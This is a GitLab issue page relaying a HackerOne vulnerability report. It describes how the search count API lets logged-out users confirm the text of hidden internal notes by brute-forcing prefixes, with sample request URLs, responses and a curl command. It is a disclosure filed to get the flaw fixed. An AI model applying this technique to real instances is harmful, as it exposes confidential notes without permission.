Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #388242
Closed
Open
Issue created Jan 17, 2023 by GitLab SecurityBot@gitlab-securitybotReporter

Gitlab search allows leaking internal notes

HackerOne report #1829768 by shells3c on 2023-01-10, assigned to @ameyadarshan:

Report | How To Reproduce

Report

Summary

Gitlab search count API returns the count of results gotten from internal notes despite users having no permission to view those notes. This results in guessing/brute-forcing the internal notes

Steps to reproduce
  1. Create a public project, then a public issue and make an internal note with the message: Internal comment
  2. Logout and do the following tests:

https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal c"

{"count":"1"}  

https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal cc"

{"count":"0"}  

https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal co"

{"count":"1"}  

https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal comment"

{"count":"1"}  
Examples

I have created an example project for testing:

curl 'https://gitlab.com/search/count?project_id=25681831&scope=notes&search=%22CVE-2021-1234%22'

{"count":"1"}  

You can confirm that the note CVE-2021-1234 exists, even though you can't see it in the Gitlab search results: https://gitlab.com/search?project_id=25681831&scope=notes&search=%22CVE-2021-1234%22

Impact

Leaking internal notes of public issues

How To Reproduce

Please add reproducibility information to this section:

Assignee
Assign to
Time tracking